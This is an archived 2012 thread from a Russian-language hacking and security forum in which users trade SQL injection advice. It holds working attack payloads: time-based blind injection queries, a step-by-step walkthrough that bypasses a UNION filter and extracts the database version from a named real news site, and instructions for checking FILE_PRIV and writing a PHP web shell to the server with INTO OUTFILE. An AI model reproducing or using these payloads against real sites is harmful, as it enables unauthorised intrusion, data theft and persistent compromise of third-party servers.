ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.01.2012, 13:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от [R
eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
UNION не работает кстати после ORDER BY.
Единственное, что я вижу, что можно попробовать, это
Код:
Code:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''
Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off
Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.
Крутить как-то так:
UPD
Код:
Code:
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));
SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));
Ток если записей много, то лучше юзать LIMIT.
Что-то по типу blind sleep-based sql injection
|
|
|
|
03.01.2012, 14:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
106017
Репутация:
-3
|
|
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Сообщение от None
If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.
|
|
|
|
03.01.2012, 14:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от AlonDelon
AlonDelon said:
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Инглиш бро. Криво установлено все.
|
|
|
|
03.01.2012, 15:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
|
|
|
|
03.01.2012, 15:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от er9j6@
er9j6@ said:
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
Код:
Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title 5.1.33-log
Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто
|
|
|
|
03.01.2012, 15:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Ereee
Ereee said:
Код:
Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто как ты количество полей подобрал, каким запросом?
|
|
|
|
03.01.2012, 16:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от er9j6@
er9j6@ said:
как ты количество полей подобрал, каким запросом?
Тут главное внимательность.
http://1cnews.com/index.php?mode=viewpart&part=10
Делаем запрос:
http://1cnews.com/index.php?mode=viewpart&part=10'
В заголовке исчезает "Events of the branch". Что то тут не так
Проверяем на inj.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1
"Events of the branch" появился. А если:
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2
Исчез. Соответственно, true и false.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f
Заголовок исчез.
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f
Пояивлся, соответственно, кол-во 3.
Ну а дальше
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f
403 forbidden
Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/
Пробуем
http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f
Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.
P.S. Вообщем контент-based injection
|
|
|
|
03.01.2012, 17:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
59158
Репутация:
2
|
|
Есть доступ к бд как залить shell ?
|
|
|
|
03.01.2012, 17:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Groove
Groove said:
Есть доступ к бд как залить shell ?
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
|
|
|
|
03.01.2012, 17:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
59158
Репутация:
2
|
|
Сообщение от Ereee
Ereee said:
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
